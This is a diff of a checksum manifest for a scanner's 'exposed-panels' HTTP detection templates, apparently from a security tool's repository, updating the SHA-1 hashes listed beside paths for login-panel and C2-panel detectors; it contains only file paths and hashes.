-http/exposed-panels/bitdefender-gravityzone.yaml:f9e522944f2fc1e56967f0b1ecd3cbe12eeae538 -http/exposed-panels/bitrix-panel.yaml:9b95dd329012f66d41f251ab6f7c33df6574d481 -http/exposed-panels/black-duck-panel.yaml:0386990588254802160a7aba348e31eb5ec64fd0 -http/exposed-panels/blue-iris-login.yaml:2089373fd1908a547162387d4d960de37a6acc15 -http/exposed-panels/bmc/bmc-discovery-panel.yaml:3bbbab79d9951c254a822f8ac94381b8d75fce18 -http/exposed-panels/bmc-panel-detect.yaml:f17b28bc5ac3d649fe2ff73f311ccf78e2137463 -http/exposed-panels/bolt-cms-panel.yaml:e74c175d2fef260b5f5891adc6edfddc31520541 -http/exposed-panels/bomgar-login-panel.yaml:e7ff6af9c5839acb61c4c67bb6fcea57af983306 -http/exposed-panels/bookstack-panel.yaml:5c4411b487396ba15c6fd72dc63aa7c62083b63b -http/exposed-panels/buddy-panel.yaml:bab19682c24c4752a28fd22e16f8133a3672c542 -http/exposed-panels/buildbot-panel.yaml:05ff5ee1c58065054a977e697e4b8e1cb9310d93 +http/exposed-panels/azkaban-web-client.yaml:e0840799ae100c4d6e1dc1ea6be5d99db51e9542 +http/exposed-panels/backpack/backpack-admin-panel.yaml:3d8d33b454756638862cfa2ed4ff3844ff3f6c7b +http/exposed-panels/barracuda-panel.yaml:5f4e7365f6754b3dba30cafa973b0bf2d5c2e5e5 +http/exposed-panels/bazarr-login.yaml:66f5e1014e3b953fa80892b8498f7f438ddd706f +http/exposed-panels/bedita-panel.yaml:9e752ad0d33b16694b122834d393f781acbe863c +http/exposed-panels/beego-admin-dashboard.yaml:c70c573a7115b22b68e7f4fc1d301192da7e2b02 +http/exposed-panels/beyondtrust-login-server.yaml:c9f9d8cb79ce9348d5840aef0002c8d605b0c0ca +http/exposed-panels/beyondtrust-panel.yaml:b82ff4f03e0d51701848b3ade0d20e84a7eaac45 +http/exposed-panels/bigant-login-panel.yaml:05ff6a4624f93e2707843c9863a15ae558060973 +http/exposed-panels/bigbluebutton-login.yaml:2a3eafe434c92e1da2f78f4f0c5885ff64f9a513 +http/exposed-panels/bigfix-login.yaml:84450c934bb1ce64efd43fc57f143543b8aa3dfd +http/exposed-panels/bigip-rest-panel.yaml:2c03e378cc1f21b336dbc672aaa0e81b8bf88f40 +http/exposed-panels/biotime-panel.yaml:6338c59d6c66c8b340736b2900e077fdfaf0a554 +http/exposed-panels/bitdefender-gravityzone.yaml:f94198978febf9daf21b03ae09371a15a7fa3f2b +http/exposed-panels/bitrix-panel.yaml:8023bf14b595d7a7df9e23b1f35193c988f36232 +http/exposed-panels/black-duck-panel.yaml:77b6163f94f4c5731be0388c1d1b3a76d4fda54c +http/exposed-panels/blue-iris-login.yaml:300a2b4a3c7dad20f872637c95f9a60c411ac148 +http/exposed-panels/bmc/bmc-discovery-panel.yaml:5aab943397c954f2e06ebc31c5f30b94c4f90955 +http/exposed-panels/bmc-panel-detect.yaml:f73d80f848b1f1c81470a571f29f86313e833129 +http/exposed-panels/bolt-cms-panel.yaml:ff194f63587e128aeeadcf4d71324ca218d93939 +http/exposed-panels/bomgar-login-panel.yaml:1ea8aaf0cdb036cbc0939640cdb367573bf7a03d +http/exposed-panels/bookstack-panel.yaml:44859d4046d91e3b307dc324737f7201681dce5f +http/exposed-panels/buddy-panel.yaml:554c7e4c65871152c0cc47e65879e32050684830 +http/exposed-panels/buildbot-panel.yaml:784103962633cfc7aca45a85005bd2e69b638444 http/exposed-panels/c2/brute-ratel-c4.yaml:8c9d3614fe8a98637475e62043728bdcc14e0cbf http/exposed-panels/c2/covenant-c2.yaml:32db211a75d38e2e5f807b6f63e9a7f4a40d13b2 http/exposed-panels/c2/deimos-c2.yaml:266a59269734128be0a942812e98d4a9fc7237dc @@ -2608,959 +2608,959 @@ http/exposed-panels/c2/hookbot-rat.yaml:9aa395e99970e3d4a6970f552ba71c923ba39ed4 http/exposed-panels/c2/mythic-c2.yaml:05a73d58dc669f0fce5b2d15f9f7becfffc1c76c http/exposed-panels/c2/nh-c2.yaml:98303079db934bddaccc41a2896fa0a144b67290 http/exposed-panels/c2/viper-c2.yaml:f8ac1add15145d048821e3939c90435972a0025f -http/exposed-panels/cacti-panel.yaml:f7139e8b3fd2434d2e91bfe34ca9a49deb06421b -http/exposed-panels/calendarix-panel.yaml:4e25ed8bc1632b96876a4fb3ef1d2b3a803c22b3 -http/exposed-panels/call-break-cms.yaml:2d19e724de531b9e8607ae7c1123dcdacd4b8d52 -http/exposed-panels/camunda-login-panel.yaml:aa4afca834d0bf65dc141208ad1035bfc956ceb5 -http/exposed-panels/cas-login.yaml:914b954dcce75710915ee32f66ce8b4b33546669 -http/exposed-panels/casdoor-login.yaml:473b3157712c0a6bea170f4eddc8fe35d645a74c -http/exposed-panels/casemanager-panel.yaml:b29855847d1b818dea2fd4fd93496fd210031caf -http/exposed-panels/caton-network-manager-system.yaml:e020569d2106a0da04838355bd711ca95c88159e -http/exposed-panels/ccm-detect.yaml:d6085394a02dd3dd90705551dbce7f8bdfcfaa35 -http/exposed-panels/centreon-panel.yaml:f118376bf8e10c96fa7bb93c7576ebc6b480e896 -http/exposed-panels/cerebro-panel.yaml:f7a827e8ad0f5800713d5f205517ab5b9bfc1acd -http/exposed-panels/checkmk/checkmarx-panel.yaml:b85dcb572f21056dd2d2c7643a1281583aed5b62 -http/exposed-panels/checkmk/checkmk-login.yaml:70a8faf58e5e476ba6bb7f02478977d8a83a23d4 -http/exposed-panels/checkpoint/ssl-network-extender.yaml:3e8215db9a12fcc5e585706641eb5044ec2bda18 -http/exposed-panels/checkpoint-panel.yaml:6db09687cf2fce65c40171db8a60196385508dd1 -http/exposed-panels/cisco/cisco-ace-device-manager.yaml:8eab0c59925164899f4b740182f86f27431437a4 -http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml:1a1c74d61a0f2b5bacc4da1fa3b3896a8c93e3ed -http/exposed-panels/cisco/cisco-asa-panel.yaml:09c678f848303f51ec88c064e59825584fe2e3e0 -http/exposed-panels/cisco/cisco-edge-340.yaml:b714a5a8b9d765d8d13b37a5e80af9cf1b3632da -http/exposed-panels/cisco/cisco-finesse-login.yaml:9630ddfd3d360bb42f38bfb0eddfb4b2d7565829 -http/exposed-panels/cisco/cisco-integrated-login.yaml:4e0b516d6e52dd6c85da4bd7fb729bc9073bf091 -http/exposed-panels/cisco/cisco-meraki-exposure.yaml:1bf3c872f561b5071f70ff96bd732cab0e51ebc6 -http/exposed-panels/cisco/cisco-prime-infrastructure.yaml:c012949b3a2df1f2d1c162ddf593fed1fc9f7688 -http/exposed-panels/cisco/cisco-sd-wan.yaml:3994c912aa9a3c9cd1af10066ed3dfb6bbfd232b -http/exposed-panels/cisco/cisco-secure-cn.yaml:b4885765a9547b3b828f943b5733a4ed09659b3e -http/exposed-panels/cisco/cisco-secure-desktop.yaml:59852e9020a3ec8e9d291f2e46158f41f5872f98 -http/exposed-panels/cisco/cisco-sendgrid.yaml:eac0fdf9ba63f371d93699a50cb02821c81d1fef -http/exposed-panels/cisco/cisco-systems-login.yaml:d7ceeef5fb3ed7eed7f2ce5e039b3d9257e7ff6e -http/exposed-panels/cisco/cisco-telepresence.yaml:fb0390b57c3b53a93d96a8acbfeaae5a2df980e7 -http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml:29982fb7dc9608f7b7d26d0c879d0d39843da27b -http/exposed-panels/cisco/cisco-vmanage-login.yaml:2053fd1fff43cd8c216fe75cc79176a69b7183d0 -http/exposed-panels/cisco/cisco-webvpn-detect.yaml:4bafea91fc36d0e42789130cacd8213eb8fb0c16 -http/exposed-panels/citrix-adc-gateway-detect.yaml:4f82549869d01d5452373143730adfe380bc8553 -http/exposed-panels/citrix-vpn-detect.yaml:7ba972e45da3f1b3ce6fc69239cd9ed015b73977 -http/exposed-panels/claris-filemaker-webdirect.yaml:a2c9b13cb964734c72ff80c6030e947c429b9d31 -http/exposed-panels/clave-login-panel.yaml:8ebd40ef0a85263b5d1ee596136ecd3b92f593c7 -http/exposed-panels/clearpass-policy-manager.yaml:e6c4e2c12c46986d4be05e307ec278bdcf33912b +http/exposed-panels/cacti-panel.yaml:0ca8d96c8aa610c737b386304da03ab6997b9b39 +http/exposed-panels/calendarix-panel.yaml:dc3833612b7af6913e9c109fc8397a59caa4855a +http/exposed-panels/call-break-cms.yaml:4e6812bcf763d14cec303e2ce56c037f8a4a900a +http/exposed-panels/camunda-login-panel.yaml:cf480f5b816c1bac8b4e7042323e0721648b60ec +http/exposed-panels/cas-login.yaml:7a9265fb218a6c0d5d52572b71eb7651de7216ff +http/exposed-panels/casdoor-login.yaml:fc1813f60f5778ddcb943f333032930b2d10b5de +http/exposed-panels/casemanager-panel.yaml:60c2deb847685ec89f0cc83219da53b3d8a928b1 +http/exposed-panels/caton-network-manager-system.yaml:2e3bf4bfa76df7bcb0f0360572aba2c0f239012b +http/exposed-panels/ccm-detect.yaml:903bd8fd74ace8329872cd4f96466c7984c6b60f +http/exposed-panels/centreon-panel.yaml:f1aae893ac7c3bc193fa117cf8c6f414802e7d4e +http/exposed-panels/cerebro-panel.yaml:1f6a020c88313643ef70badeae69c3ba091e3fb9 +http/exposed-panels/checkmk/checkmarx-panel.yaml:e07e9c108f4881c04ae64b8caaa006e42c7ce7cc +http/exposed-panels/checkmk/checkmk-login.yaml:37e2aa50df0ece1266fad922dd44fe097c251a6d +http/exposed-panels/checkpoint/ssl-network-extender.yaml:1164e1fe90e846730a491598ac71d974acfad723 +http/exposed-panels/checkpoint-panel.yaml:ff8d3af6822f0cbc83625ad8b601c0a1668d9413 +http/exposed-panels/cisco/cisco-ace-device-manager.yaml:1c217a5b2bb0f1dae39ee4415122973dbeebff12 +http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml:0c63c12ef74be201b58ccc7b764307d3c6380f94 +http/exposed-panels/cisco/cisco-asa-panel.yaml:f8acef79a2b69d2a5e813b4cd159085c178c84ca +http/exposed-panels/cisco/cisco-edge-340.yaml:85437591405b2aa48ef2b148691401d226a362b1 +http/exposed-panels/cisco/cisco-finesse-login.yaml:fe8951be1c394d322ec9bc6de578d9681f9cce8d +http/exposed-panels/cisco/cisco-integrated-login.yaml:868d9d0c7cb14cce2492905bf830748b13417eb3 +http/exposed-panels/cisco/cisco-meraki-exposure.yaml:4e95c26c8c9cf9216ba12f3045924beff920153d +http/exposed-panels/cisco/cisco-prime-infrastructure.yaml:6c137374a87f68cf319ba686451aa906b7167529 +http/exposed-panels/cisco/cisco-sd-wan.yaml:00211c4103d5959a501380d05faa94c410f3d926 +http/exposed-panels/cisco/cisco-secure-cn.yaml:ce859e49544588c78b39e76fe5c7bafdb624967f +http/exposed-panels/cisco/cisco-secure-desktop.yaml:5a93b67af591fe4527770a52e68780fc2eedb92a +http/exposed-panels/cisco/cisco-sendgrid.yaml:ab3f6646f0e95c3a45efae3b037de931273cc0ed +http/exposed-panels/cisco/cisco-systems-login.yaml:e19f147603cec2b1e9643c336afc54e1b585e57a +http/exposed-panels/cisco/cisco-telepresence.yaml:267f58bd184190446b31fede0c00354639ac5e14 +http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml:0c88ce1704b4159067bbb69bf610fdfaf3f57710 +http/exposed-panels/cisco/cisco-vmanage-login.yaml:411d6b87e481e21a7071b9443ddf9d89e6cbe264 +http/exposed-panels/cisco/cisco-webvpn-detect.yaml:a555c4b3c0a1ace4ade4718abb786b60168ff82c +http/exposed-panels/citrix-adc-gateway-detect.yaml:8abe369182866488b97374b93ee54a8ef820fd85 +http/exposed-panels/citrix-vpn-detect.yaml:9f2cab809c190612b8bcc3eeabe3fb2f541a4841 +http/exposed-panels/claris-filemaker-webdirect.yaml:df59decfb2bfeeb3288692446fa0a363f1de1a01 +http/exposed-panels/clave-login-panel.yaml:5178dca6474651243d72155114b7c3f15f851c38 +http/exposed-panels/clearpass-policy-manager.yaml:cca2f47d8036ba3099792edb9701dbf4517060e9 http/exposed-panels/cloudpanel-login.yaml:1aa24222b0743bf453d39181ad0bcf8b700970f1 -http/exposed-panels/cloudphysician-radar.yaml:dee00c79c88e60534e50fa550052d7b7685a70f0 -http/exposed-panels/cobbler-webgui.yaml:9e0367ce93a24f79633e8a71e2f1a94bd9804a4d -http/exposed-panels/code-server-login.yaml:6f7e0aea6fd6a66a1c3afac6a722a5218481d5dc -http/exposed-panels/code42-panel.yaml:e3d71969699f1e679f267801815e037afbeb9ab2 -http/exposed-panels/codemeter-webadmin-panel.yaml:295bd5c08379d3dc2accace82931b13ecf125a33 -http/exposed-panels/cofense-vision-panel.yaml:4825eccd5a0c5c8614e13c1d0e4b083046192ec0 -http/exposed-panels/coldfusion-administrator-login.yaml:962c6a9f4758de4919bac01dff0c8903bf74613a -http/exposed-panels/compal-panel.yaml:e95ecd68927ee99bcf9afd2cb82605e39aabb3e5 -http/exposed-panels/completeview-web-panel.yaml:3758348af98c6d8c7f3c5b2bc21ae80dd6beca93 -http/exposed-panels/concourse-ci-panel.yaml:948cac1c291b7898d49498f75b4879f0c8114ef9 -http/exposed-panels/concrete5/concrete5-install.yaml:ba0d94f1169c368e1abc9e742128c11bc292340a -http/exposed-panels/concrete5/concrete5-panel.yaml:5295dd46652f0062f6b391db26bfac2ca49310b3 -http/exposed-panels/connect-box-login.yaml:43d5a4276dadb6cfc3a0cc110c0f1fb6026d0dc3 -http/exposed-panels/connectwise-backup-manager.yaml:d742b9837625b3ef45c79b5ae69f7ee99ae8c78e -http/exposed-panels/contao-login-panel.yaml:75829afbc9b07c1a6c05d4cec29ba95716d5f308 -http/exposed-panels/content-central-login.yaml:b8c466eec1c08a625d940acc66a2fce1d0a091d1 -http/exposed-panels/contentkeeper-detect.yaml:d90718a91aa3ee2a943fc2f892ea5207437e6e22 -http/exposed-panels/corebos-panel.yaml:359709a29a2f01ba9540038b59a1965e111d7820 -http/exposed-panels/cortex-xsoar-login.yaml:ac0fdeb06af3f53b79413ce91ae0e348d69ccd49 -http/exposed-panels/couchdb-exposure.yaml:0ab68241311f8c383de980927a97022391dc03fb -http/exposed-panels/couchdb-fauxton.yaml:78e0165964da5864b093a69e3a0f50224c88813d -http/exposed-panels/cpanel-api-codes.yaml:256eb94dcf2065470364d2530740f5cfaaef86f7 -http/exposed-panels/craftcms-admin-panel.yaml:13aa643c72410e3c04caa627ce834101f2c7f5c8 -http/exposed-panels/creatio-login-panel.yaml:a118be651a60a7f43df94e246db1dfb3572a0002 +http/exposed-panels/cloudphysician-radar.yaml:ab78396ac841fcc8e0465a63d54d01edfda5e6eb +http/exposed-panels/cobbler-webgui.yaml:91fa19ca360f50e53e162afb53fc3952ac381703 +http/exposed-panels/code-server-login.yaml:8ad0006a06e3423e83e4b9ee6be119f855e210ed +http/exposed-panels/code42-panel.yaml:19b2e4debc938179621776c5e1bea6b68c22c8f1 +http/exposed-panels/codemeter-webadmin-panel.yaml:1f093b6b0085e6f8403d373f89616c04aff7a617 +http/exposed-panels/cofense-vision-panel.yaml:b3d886fad162e5796f8694fefcc261f12502bbdf +http/exposed-panels/coldfusion-administrator-login.yaml:fdc23c9cfb0d93f0476eebb36db3b991320d391a +http/exposed-panels/compal-panel.yaml:e285223531ebabd146057e4d622741a6a2f92ad9 +http/exposed-panels/completeview-web-panel.yaml:7c2ab3e55525145391ed9fa76adff9b1493a1038 +http/exposed-panels/concourse-ci-panel.yaml:8c8814723d6f52b2df583576113a04bad94dff19 +http/exposed-panels/concrete5/concrete5-install.yaml:5145048fefdf88f8c2dbda191762ba12bbf42940 +http/exposed-panels/concrete5/concrete5-panel.yaml:302ac5c82908ca097e5b950bf3882ab03c747e11 +http/exposed-panels/connect-box-login.yaml:3704e073ad42a395565520f6591004a47efa8663 +http/exposed-panels/connectwise-backup-manager.yaml:7ca5542759dad1823de0c8e200862967ad06a4f9 +http/exposed-panels/contao-login-panel.yaml:b462c21beb116c4f8677531cdb547b9f8899e4bb +http/exposed-panels/content-central-login.yaml:1058fd01d86cde9fef9e3a77d68b3bd388b6027e +http/exposed-panels/contentkeeper-detect.yaml:7fbebc812afc43cdddc91e9f652c6cc38f66faee +http/exposed-panels/corebos-panel.yaml:85bbee625ed4c5dd61dbd281b549680ca95cf729 +http/exposed-panels/cortex-xsoar-login.yaml:6bdb8ef1e3b36b022cdbd03693c3877d018cc77a +http/exposed-panels/couchdb-exposure.yaml:30917e11d1033fc59ee5db520f48411fcf203981 +http/exposed-panels/couchdb-fauxton.yaml:477904a97b32ce8ff35a398565f13038352a9091 +http/exposed-panels/cpanel-api-codes.yaml:c1381c85d39bc71ea4dc94de923c42e5509f7c90 +http/exposed-panels/craftcms-admin-panel.yaml:d94a549259606afb850851c94b55346e6fe784d2 +http/exposed-panels/creatio-login-panel.yaml:6ab584adfad93cfb885c5e07da90009ef37cec7d http/exposed-panels/crontab-ui.yaml:656b21e48ecad5cd6e0442d7b5538601c372578e -http/exposed-panels/crush-ftp-login.yaml:e3ea9e9f76f02e3b4658e92aae6e1717aa8ba9d2 -http/exposed-panels/crxde-lite.yaml:152ab7fcbf5cdb4b19dd7b92eeaee50a46bcb2e4 +http/exposed-panels/crush-ftp-login.yaml:43c0a25b4a6433403c9c8ce715174febd4916e8d +http/exposed-panels/crxde-lite.yaml:302ecae66e566118b94582db702be513d9a1d3f6 http/exposed-panels/cryptobox-panel.yaml:c68dfe8a30b5ebb97ee6a48ae6b4023365ea75fe -http/exposed-panels/csod-panel.yaml:592c630420d96bb7a43ec9c207d3fb2597fbdbf9 -http/exposed-panels/cudatel-panel.yaml:152c3fad7cf985480b6c7de2f39cc37c464c4266 -http/exposed-panels/cvent-panel-detect.yaml:1d69afc5bb623967c4e2e45611b27d50f6f76d7d -http/exposed-panels/cwp-webpanel.yaml:cca561edd254ca635ea9f720c6f1515e651bd73e -http/exposed-panels/cx-cloud-login.yaml:2d9696f3c588b8c973599992a9fc94a9dd4047b1 -http/exposed-panels/cyberoam-ssl-vpn-panel.yaml:0c0d87cce306c1d154b866447ea23582e66b7c84 -http/exposed-panels/d-link-wireless.yaml:5a61e4aed70f61a933fdc5280d909e46ea6eaaf7 -http/exposed-panels/darktrace-threat-visualizer.yaml:cc42c0ae900d1ead28fd8a5126958ab67453d085 -http/exposed-panels/datadog-login.yaml:eecb176a9b70b75b8997970f63c4fd63cb72664a -http/exposed-panels/dataiku-panel.yaml:ccc01376143bc524039ba721ba23d201055f3735 -http/exposed-panels/davantis-panel.yaml:8e5295cc1d2a6ca2daf9aecb9edeb9c7bff6e17c -http/exposed-panels/daybyday-panel.yaml:ed65d347e09146954a5b1cca407532d78a58c05e -http/exposed-panels/defectdojo-panel.yaml:001b3b8655d778e45da88fdfd212b9f1195f0df7 +http/exposed-panels/csod-panel.yaml:65e3d6fd0f28a5a23ca62b861fd79ade7877187c +http/exposed-panels/cudatel-panel.yaml:4f1ed765a69dbdb40c8430e0d4dbfdaa78d685c7 +http/exposed-panels/cvent-panel-detect.yaml:d4bce1e521d41d8665b1c9d13b839bfacaab0342 +http/exposed-panels/cwp-webpanel.yaml:813ff295dd80fb2b400246672931f844492ab8df +http/exposed-panels/cx-cloud-login.yaml:dc6bcee1b3c8608446ec2bfc0237cbcc45a6ec19 +http/exposed-panels/cyberoam-ssl-vpn-panel.yaml:109ca01258246c77f2a60f320f5c7cdda3f822f0 +http/exposed-panels/d-link-wireless.yaml:427558c1cabb088821355e2c3c78fca3503beb06 +http/exposed-panels/darktrace-threat-visualizer.yaml:1cfae22d0f97d2eda498427fcc742b991c4e3260 +http/exposed-panels/datadog-login.yaml:e85f32bdfc0b3906ece99192691183f9c8144c39 +http/exposed-panels/dataiku-panel.yaml:ba64117fa67cf9a5855679e5197f576902d913de +http/exposed-panels/davantis-panel.yaml:c03b26bb73911e2dbdf694aca3b2eeee5c0f1b34 +http/exposed-panels/daybyday-panel.yaml:8ed488191a395ea801b2056dceb3f47a7ce0ca2e +http/exposed-panels/defectdojo-panel.yaml:9e0765aa7e93715b22934b41166dcdee56bc268c http/exposed-panels/dell-idrac.yaml:5c2bf1e55a058ebc72c278b745dec7f32a2e1c52 -http/exposed-panels/dell-openmanager-login.yaml:c5e109cb5ad04b406e27788f57dd43b0928ec207 -http/exposed-panels/dell-wyse-login.yaml:6b91c4824dda8ac6ce13fb2a958d78e02e43b54b -http/exposed-panels/delta-login-panel.yaml:21413b42b25c6a8452c03d484840a0bd28137c1e -http/exposed-panels/deluge-webui-panel.yaml:357651ff3a6c17d8d74f308b7dd1373122c623d7 -http/exposed-panels/dericam-login.yaml:b66162100b19bb2c0e4292cdc06e864d88aa9f89 -http/exposed-panels/digitalrebar-login.yaml:6cc59079d287a1f9d57f9d5885c581ee31e21b07 -http/exposed-panels/directadmin-login-panel.yaml:e8b0ca1d20792309856035a189b5a9b35c779b91 -http/exposed-panels/directum-login.yaml:946ae50c71c1e26bfe96c2dcf5cb040a04729f8d -http/exposed-panels/django-admin-panel.yaml:fe87f29c0705376f0edfa85d1622c22d8b4b3a3a -http/exposed-panels/docebo-elearning-panel.yaml:81227e05f3e20b81e1835f9e00dd08bbc231892e -http/exposed-panels/dolibarr-panel.yaml:0fcd6c54d58c854a21d9c5ecea23bc679d48fb70 -http/exposed-panels/dotclear-panel.yaml:7a0b5dda3d4298fcbbd8dd1eb708eecceffeabbc -http/exposed-panels/dotcms-admin-panel.yaml:bd3fe82741696c7fdd2dd4bcd1ae452b003be5a0 -http/exposed-panels/dplus-dashboard.yaml:c2e6cf2d795e45d4a12c51c6147f8c07ce17dc20 -http/exposed-panels/dqs-superadmin-panel.yaml:055b7f4269b6909400250ef6a77a16d71dc71f4f -http/exposed-panels/dradis-pro-panel.yaml:5f1e21479d2bacd89ae8e8ff9b977990c2668040 -http/exposed-panels/drawio-flowchartmaker-panel.yaml:74a15c0015b371f8d8037d578822e35a4b60f2f2 -http/exposed-panels/drone-ci-panel.yaml:3725586edecf4ce123a3ce514627db4273040f1b -http/exposed-panels/druid-console-exposure.yaml:52bb50b2b86c64947e93ade5e026aa1fe4439b7c -http/exposed-panels/druid-panel.yaml:d9af1df3f6c57591f0c53ca97d49a4add445f771 -http/exposed-panels/drupal-login.yaml:a0ab7c01e04a687031f25618fd9c84af0d28b184 -http/exposed-panels/dynamicweb-panel.yaml:86f479df30aaf9a804c0029bf7c4ca759912d309 -http/exposed-panels/dynatrace-panel.yaml:4e53bcf2b3f0e2c7bc0725aecf1b6a03b5c6b43f -http/exposed-panels/dzzoffice/dzzoffice-install.yaml:6b41859a07f281e320b945ced149f9cd0d5dcf39 -http/exposed-panels/dzzoffice/dzzoffice-panel.yaml:f7dc3bf43b62a7210b795e1aa074d69697575e6c -http/exposed-panels/e-mobile-panel.yaml:99980114c50b18e82763b14b8295e2e8f807119f -http/exposed-panels/eMerge-panel.yaml:e6b779ec85f6ea15d8490622f78307ba929d5b17 +http/exposed-panels/dell-openmanager-login.yaml:bcb7251f61c2a48417744d2bea1b0edf50799c50 +http/exposed-panels/dell-wyse-login.yaml:1fe2d5e4ecba5082a77937e036c1ea2657596687 +http/exposed-panels/delta-login-panel.yaml:1df6aaa165467783b6577707c3d70d20001570c5 +http/exposed-panels/deluge-webui-panel.yaml:13f0dcb5e9ab0b7ee9b9a000aec224cdf2ddf4e0 +http/exposed-panels/dericam-login.yaml:3403129db0d7ce6db006c2d346abc4e0a86dfeed +http/exposed-panels/digitalrebar-login.yaml:c77759032fa4cfb2e16d172ba96226909f92cd55 +http/exposed-panels/directadmin-login-panel.yaml:409b49e557aa98d97ca95d19fcb7039a4a840258 +http/exposed-panels/directum-login.yaml:e52dd3da095158a998e1915406852ac23af12035 +http/exposed-panels/django-admin-panel.yaml:09597c15781c7c9fa66a81c56cdbdc1a71775d86 +http/exposed-panels/docebo-elearning-panel.yaml:4d2678ae2206f6daadff3b6d910fde5e7a9459e1 +http/exposed-panels/dolibarr-panel.yaml:f81bb4e67b46c8071db9e24f0f4c48061eaa28e5 +http/exposed-panels/dotclear-panel.yaml:c7e8e42cb6a756da50a9c751bfa7c468a14d828e +http/exposed-panels/dotcms-admin-panel.yaml:abae4e060f3bb5775b77b2a20989eb936a1927d0 +http/exposed-panels/dplus-dashboard.yaml:f43289a4787112d5e9a9fb7b7cb56e65bfc4dd70 +http/exposed-panels/dqs-superadmin-panel.yaml:88c0f721e55a7a13337707dc4dfc90114f3d8631 +http/exposed-panels/dradis-pro-panel.yaml:a80dd39e4629989439f2bbd319e15bb756106047 +http/exposed-panels/drawio-flowchartmaker-panel.yaml:230660e4a670660956180ab97f1eef15a94c74ea +http/exposed-panels/drone-ci-panel.yaml:7b990e9b865f0969e3051d0b9c465bc9ed5b429f +http/exposed-panels/druid-console-exposure.yaml:43a3f81fdd0806338c1129bb3c83a85c2c8e196e +http/exposed-panels/druid-panel.yaml:7de20dae7d060d544534b213412f223012e99e92 +http/exposed-panels/drupal-login.yaml:d0a2b858b062019ed15eb55fb442c865691eaca8 +http/exposed-panels/dynamicweb-panel.yaml:ebb92f92a4afcce6be9b5520882f2c24f400fd0d +http/exposed-panels/dynatrace-panel.yaml:445cf0ce7faf6f856e627ceb66d40d60ed8ca7e3 +http/exposed-panels/dzzoffice/dzzoffice-install.yaml:47847ae86c9c33ca3205b810983633ec92a61aff +http/exposed-panels/dzzoffice/dzzoffice-panel.yaml:96d7f7f564cbb9cf46339b754ec35efb3a8536d5 +http/exposed-panels/e-mobile-panel.yaml:4cfaee73212ef6905363313689a43e3265b059ef +http/exposed-panels/eMerge-panel.yaml:7fec38803450792ae1d9506ca13d5f51462fedbb http/exposed-panels/earcu-panel.yaml:4680b33172ce468b93eb9defa13bc3dc9bb50d9a http/exposed-panels/eclipse-birt-panel.yaml:18b81d2ea0b3ab529dd65947a962b2b0ee7777e3 -http/exposed-panels/ecosys-command-center.yaml:b03b6f6fc246a3f04b040213838a7fdee615f95c -http/exposed-panels/edgeos-login.yaml:1c77400a2a73bdabd6ab55b7c3c0aa171f65b4a1 +http/exposed-panels/ecosys-command-center.yaml:5154236db30e64ca43ad5e58c759a1bed96575e2 +http/exposed-panels/edgeos-login.yaml:03a1e5bb140bc5a10500928d58100810e6e96a75 http/exposed-panels/efak-login-panel.yaml:647a69312cfd4f6e6bdefb450573ad13d5290119 -http/exposed-panels/eko-management-console-login.yaml:f6a17fdde102d3907652cead2d898c9d92522c3a -http/exposed-panels/eko-software-update-panel.yaml:498ae0fbbb4b932746e1a10ccb2794d6f422f738 -http/exposed-panels/elemiz-network-manager.yaml:07ee55d78342df88368e93fb67b4b94402b2012b -http/exposed-panels/emby-panel.yaml:c2061820ecf8e989362b19e59a84cf1ed53fe119 -http/exposed-panels/emerson-power-panel.yaml:4b4fc09a5dfcd5c71195667700f53843d5b43b05 -http/exposed-panels/emessage-panel.yaml:50c56e9e32ef8352c336f8a49ba947751096cb29 -http/exposed-panels/ems-login-panel.yaml:8fbdffeaa41f8867b90354eb3961228f1b62c075 -http/exposed-panels/ems-webclient-panel.yaml:d460ae303275b54f74a07dfdc0be37a5619ad275 -http/exposed-panels/entrust-identityguard.yaml:b9af399a8dad97c9c0fa7f80f903bf5b7092847b +http/exposed-panels/eko-management-console-login.yaml:e9b4669954b8ad87ea462f42b7c1849437b0a591 +http/exposed-panels/eko-software-update-panel.yaml:069179ffe7d720ba7fe57d27f481b4afcaccffd3 +http/exposed-panels/elemiz-network-manager.yaml:2aba43b37d8f24ca7c2b289f1611e00c216e6684 +http/exposed-panels/emby-panel.yaml:cdab0928e57adc4e35432ff2ed70d10b6b88abe1 +http/exposed-panels/emerson-power-panel.yaml:d6c871f43148089755a123fb43f0eb443f4acb09 +http/exposed-panels/emessage-panel.yaml:d226c74d4929f261fc9a4c3a813cfb4b71881f2e +http/exposed-panels/ems-login-panel.yaml:3e4b39da732c0a2d2cadcdb1c1af83c3025cb193 +http/exposed-panels/ems-webclient-panel.yaml:5683c4f4c2c6fdb2989fd22faa04107ca1602317 +http/exposed-panels/entrust-identityguard.yaml:8bd9e2c82ff20a63474b493c21c70be85c22a991 http/exposed-panels/eos-http-browser.yaml:461e86a9d99441fe8e7bf6deb7c8d7da2d46d0e5 -http/exposed-panels/episerver-panel.yaml:2bc9b6b40d5c771ae7ed2d153e6e7265ac4aa165 -http/exposed-panels/epson-access-detect.yaml:e44720496080b335a7f6d3b441bd4ebb0ad23482 -http/exposed-panels/epson-projector-detect.yaml:c2de8d1bdac7a6a9a5d5b18aa379c905500fe378 -http/exposed-panels/epson-web-control-detect.yaml:40f95500f650cc71f6e6f09216effd5fb752a985 -http/exposed-panels/esphome-panel.yaml:c14d9d2849a91205b0c3de0bcd4068cccd3c8f20 -http/exposed-panels/esxi-system.yaml:07177fef3dc91e127d080010e3eeea927a531ba8 -http/exposed-panels/eventum-panel.yaml:f10fde6f8c297737212d5d315299ccf4bfb8f002 -http/exposed-panels/ewm-manager-panel.yaml:36b3f20d1f0798342d241b9551404fface3a6fbe -http/exposed-panels/exagrid-manager-panel.yaml:d333393be943baf8222a8144c20b44a181589f18 -http/exposed-panels/exolis-engage-panel.yaml:6457bef66061ae9f0207ebb84d57e9d0e33354d5 -http/exposed-panels/exposed-webalizer.yaml:3bd72bf5ff1dac37acd01de0b36aa64cbcf42d62 -http/exposed-panels/extreme-netconfig-ui.yaml:97640cd94f203ab91d548457e7cd27880ee65daa -http/exposed-panels/extron-cms-panel.yaml:ed2a23a9a9c8db05f4f412811ad2e9c50f8d2465 -http/exposed-panels/ez-publish-panel.yaml:9726e57820b42b8c06281b799d5cd38687d2566c -http/exposed-panels/f-secure-policy-manager.yaml:22b5c8b0a77ee7c6c604b219a80b6bfede0ee135 -http/exposed-panels/faraday-login.yaml:8ff7cbbbc266ac7ba91a53be896436e549ab8a94 